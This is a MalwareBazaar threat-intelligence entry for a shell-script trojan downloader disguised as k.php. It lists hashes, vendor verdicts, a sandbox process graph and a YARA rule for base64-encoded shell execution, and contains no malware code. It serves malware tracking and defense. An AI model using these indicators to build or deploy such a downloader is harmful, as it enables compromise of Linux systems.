MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 7


Intelligence 7 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f
SHA3-384 hash: 1fa49e29be3173bc9fd7906870575319d1e3f8e78115fa1416ae4cd2f74378b8d3471d2b282cfa4e66288afa8a8b24f7
SHA1 hash: 45e6aac2dc4990599145717785f1be756f738e79
MD5 hash: b345f289e4ca2a61dbd894cfaffa45c8
humanhash: winter-romeo-quiet-spaghetti
File name:k.php
Download: download sample
File size:19'499 bytes
First seen:2026-03-15 09:16:40 UTC
Last seen:2026-03-16 08:38:09 UTC
File type: sh
MIME type:text/x-shellscript
ssdeep 384:NFcuQpWx+BL0SWL0g5zsO9a4cbddrME8jyfzsO9a4cbddrME8jy4:NF8i+BL0SI0OzsP4cbddr7zsP4cbddrk
TLSH T13E925CB512896C79FBD0CE399F3C7F4DADE8C2C42124A3ACBA4F39215A1166DCB05359
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:sh

Intelligence

File Origin
# of uploads :
2
# of downloads :
73
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
evasive masquerade
Link:
https://www.filescan.io/uploads/69b679194678eefbc7abfa0e/reports/654c740b-434d-47a5-8aba-eaed9b8fb9de/overview
Verdict:
Malicious
File Type:
unix shell
Detections:
HEUR:Trojan-Downloader.Shell.Agent.bc
Link:
https://opentip.kaspersky.com/3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/1ceb8744-072f-4b33-8986-90235f2de464
Behavior Graph:
Download SVG
%3 guuid=34a341fa-1600-0000-bce0-227f830d0000 pid=3459 /usr/bin/sudo guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466 /tmp/sample.bin guuid=34a341fa-1600-0000-bce0-227f830d0000 pid=3459->guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466 execve guuid=8fedb3fc-1600-0000-bce0-227f8c0d0000 pid=3468 /usr/bin/bash guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=8fedb3fc-1600-0000-bce0-227f8c0d0000 pid=3468 clone guuid=c349c7fc-1600-0000-bce0-227f8d0d0000 pid=3469 /usr/bin/bash guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=c349c7fc-1600-0000-bce0-227f8d0d0000 pid=3469 clone guuid=d0db29fd-1600-0000-bce0-227f8f0d0000 pid=3471 /usr/bin/mkdir guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=d0db29fd-1600-0000-bce0-227f8f0d0000 pid=3471 execve guuid=74d194fd-1600-0000-bce0-227f910d0000 pid=3473 /usr/bin/mkdir guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=74d194fd-1600-0000-bce0-227f910d0000 pid=3473 execve guuid=abc6fdfd-1600-0000-bce0-227f930d0000 pid=3475 /usr/bin/mkdir guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=abc6fdfd-1600-0000-bce0-227f930d0000 pid=3475 execve guuid=467669fe-1600-0000-bce0-227f960d0000 pid=3478 /usr/bin/mkdir guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=467669fe-1600-0000-bce0-227f960d0000 pid=3478 execve guuid=aae5c4fe-1600-0000-bce0-227f980d0000 pid=3480 /usr/bin/mkdir guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=aae5c4fe-1600-0000-bce0-227f980d0000 pid=3480 execve guuid=ec2921ff-1600-0000-bce0-227f9a0d0000 pid=3482 /usr/bin/mkdir guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=ec2921ff-1600-0000-bce0-227f9a0d0000 pid=3482 execve guuid=d5cd78ff-1600-0000-bce0-227f9c0d0000 pid=3484 /usr/bin/mkdir guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=d5cd78ff-1600-0000-bce0-227f9c0d0000 pid=3484 execve guuid=634b0300-1700-0000-bce0-227f9f0d0000 pid=3487 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=634b0300-1700-0000-bce0-227f9f0d0000 pid=3487 execve guuid=a93b6b00-1700-0000-bce0-227fa20d0000 pid=3490 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=a93b6b00-1700-0000-bce0-227fa20d0000 pid=3490 execve guuid=8294c400-1700-0000-bce0-227fa40d0000 pid=3492 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=8294c400-1700-0000-bce0-227fa40d0000 pid=3492 execve guuid=f7496501-1700-0000-bce0-227faa0d0000 pid=3498 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=f7496501-1700-0000-bce0-227faa0d0000 pid=3498 execve guuid=2acbd001-1700-0000-bce0-227fab0d0000 pid=3499 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=2acbd001-1700-0000-bce0-227fab0d0000 pid=3499 execve guuid=6d6e3302-1700-0000-bce0-227fac0d0000 pid=3500 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=6d6e3302-1700-0000-bce0-227fac0d0000 pid=3500 execve guuid=d49c9802-1700-0000-bce0-227fad0d0000 pid=3501 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=d49c9802-1700-0000-bce0-227fad0d0000 pid=3501 execve guuid=b3d3ef02-1700-0000-bce0-227fae0d0000 pid=3502 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=b3d3ef02-1700-0000-bce0-227fae0d0000 pid=3502 execve guuid=ba205b03-1700-0000-bce0-227faf0d0000 pid=3503 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=ba205b03-1700-0000-bce0-227faf0d0000 pid=3503 execve guuid=21bbbe03-1700-0000-bce0-227fb00d0000 pid=3504 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=21bbbe03-1700-0000-bce0-227fb00d0000 pid=3504 execve guuid=7ae91c04-1700-0000-bce0-227fb10d0000 pid=3505 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=7ae91c04-1700-0000-bce0-227fb10d0000 pid=3505 execve guuid=8c6f8104-1700-0000-bce0-227fb20d0000 pid=3506 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=8c6f8104-1700-0000-bce0-227fb20d0000 pid=3506 execve guuid=f1d1dc04-1700-0000-bce0-227fb30d0000 pid=3507 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=f1d1dc04-1700-0000-bce0-227fb30d0000 pid=3507 execve guuid=24b24605-1700-0000-bce0-227fb40d0000 pid=3508 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=24b24605-1700-0000-bce0-227fb40d0000 pid=3508 execve guuid=8d1cae05-1700-0000-bce0-227fb50d0000 pid=3509 /usr/bin/cp guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=8d1cae05-1700-0000-bce0-227fb50d0000 pid=3509 execve guuid=edb81106-1700-0000-bce0-227fb60d0000 pid=3510 /usr/bin/touch guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=edb81106-1700-0000-bce0-227fb60d0000 pid=3510 execve guuid=9cf14d06-1700-0000-bce0-227fba0d0000 pid=3514 /usr/bin/bash guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=9cf14d06-1700-0000-bce0-227fba0d0000 pid=3514 clone guuid=311d5606-1700-0000-bce0-227fbb0d0000 pid=3515 /usr/bin/bash guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=311d5606-1700-0000-bce0-227fbb0d0000 pid=3515 clone guuid=6f297206-1700-0000-bce0-227fbc0d0000 pid=3516 /usr/bin/bash guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=6f297206-1700-0000-bce0-227fbc0d0000 pid=3516 clone guuid=9a3e7806-1700-0000-bce0-227fbd0d0000 pid=3517 /usr/bin/base64 write-file guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=9a3e7806-1700-0000-bce0-227fbd0d0000 pid=3517 execve guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520 /usr/bin/bash guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520 execve guuid=ccec470d-1700-0000-bce0-227fda0d0000 pid=3546 /usr/bin/rm delete-file guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=ccec470d-1700-0000-bce0-227fda0d0000 pid=3546 execve guuid=f4bec20d-1700-0000-bce0-227fdc0d0000 pid=3548 /usr/bin/bash guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=f4bec20d-1700-0000-bce0-227fdc0d0000 pid=3548 clone guuid=b642cc0d-1700-0000-bce0-227fdd0d0000 pid=3549 /usr/bin/bash guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=b642cc0d-1700-0000-bce0-227fdd0d0000 pid=3549 clone guuid=5fe3160e-1700-0000-bce0-227fdf0d0000 pid=3551 /usr/bin/bash guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=5fe3160e-1700-0000-bce0-227fdf0d0000 pid=3551 execve guuid=92e1a50e-1700-0000-bce0-227fe10d0000 pid=3553 /usr/bin/rm guuid=65e460fc-1600-0000-bce0-227f8a0d0000 pid=3466->guuid=92e1a50e-1700-0000-bce0-227fe10d0000 pid=3553 execve guuid=60c78c07-1700-0000-bce0-227fc20d0000 pid=3522 /usr/bin/bash guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=60c78c07-1700-0000-bce0-227fc20d0000 pid=3522 clone guuid=fe1bb007-1700-0000-bce0-227fc30d0000 pid=3523 /usr/bin/bash guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=fe1bb007-1700-0000-bce0-227fc30d0000 pid=3523 clone guuid=2f0c0a08-1700-0000-bce0-227fc50d0000 pid=3525 /usr/bin/ls guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=2f0c0a08-1700-0000-bce0-227fc50d0000 pid=3525 execve guuid=c3128808-1700-0000-bce0-227fc80d0000 pid=3528 /usr/bin/cat guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=c3128808-1700-0000-bce0-227fc80d0000 pid=3528 execve guuid=32cdc108-1700-0000-bce0-227fca0d0000 pid=3530 /usr/bin/ls guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=32cdc108-1700-0000-bce0-227fca0d0000 pid=3530 execve guuid=ba352309-1700-0000-bce0-227fcc0d0000 pid=3532 /usr/bin/mkdir guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=ba352309-1700-0000-bce0-227fcc0d0000 pid=3532 execve guuid=2c2e7109-1700-0000-bce0-227fce0d0000 pid=3534 /usr/bin/mv guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=2c2e7109-1700-0000-bce0-227fce0d0000 pid=3534 execve guuid=04bbd809-1700-0000-bce0-227fd00d0000 pid=3536 /usr/bin/bash guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=04bbd809-1700-0000-bce0-227fd00d0000 pid=3536 clone guuid=8f2ae009-1700-0000-bce0-227fd10d0000 pid=3537 /usr/bin/base64 write-file guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=8f2ae009-1700-0000-bce0-227fd10d0000 pid=3537 execve guuid=abdd470a-1700-0000-bce0-227fd20d0000 pid=3538 /usr/bin/rm delete-file guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=abdd470a-1700-0000-bce0-227fd20d0000 pid=3538 execve guuid=3460a20a-1700-0000-bce0-227fd30d0000 pid=3539 /usr/bin/ls guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=3460a20a-1700-0000-bce0-227fd30d0000 pid=3539 execve guuid=1909350b-1700-0000-bce0-227fd40d0000 pid=3540 /usr/bin/bash guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=1909350b-1700-0000-bce0-227fd40d0000 pid=3540 clone guuid=7e913d0b-1700-0000-bce0-227fd50d0000 pid=3541 /usr/bin/base64 write-file guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=7e913d0b-1700-0000-bce0-227fd50d0000 pid=3541 execve guuid=5f53a50b-1700-0000-bce0-227fd60d0000 pid=3542 /usr/bin/ls guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=5f53a50b-1700-0000-bce0-227fd60d0000 pid=3542 execve guuid=74b71b0c-1700-0000-bce0-227fd80d0000 pid=3544 /usr/bin/cat guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=74b71b0c-1700-0000-bce0-227fd80d0000 pid=3544 execve guuid=36ee7e0c-1700-0000-bce0-227fd90d0000 pid=3545 /usr/bin/ls guuid=9d3ef106-1700-0000-bce0-227fc00d0000 pid=3520->guuid=36ee7e0c-1700-0000-bce0-227fd90d0000 pid=3545 execve
Score:
81%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f/
Verdict:
Malicious
Threat:
Trojan-Downloader.Shell.Agent
Link:
https://tip.neiki.dev/file/3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f
Threat name:
Script-Shell.Trojan.Vigorf
Create hunting rule
Status:
Malicious
First seen:
2026-03-15 09:17:19 UTC
File Type:
Text (Shell)
AV detection:
12 of 24 (50.00%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=hro2yqe6wlgzxvqbtbtmrfotdnuhz3yfhx2oozyibmk5asd3bixq._file
Result
Malware family:
n/a
Score:
  4/10
Tags:
defense_evasion discovery linux
Link:
https://tria.ge/reports/260315-k848esgz51/
Behaviour
Reads runtime system information
Writes file to tmp directory
Deobfuscate/Decode Files or Information
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:SUSP_LNX_Base64_Exec_Apr24
Create hunting rule
Author:Christian Burkard
Description:Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)
Reference:Internal Research

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

sh 3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3792476/
  
Delivery method
Distributed via web download

Comments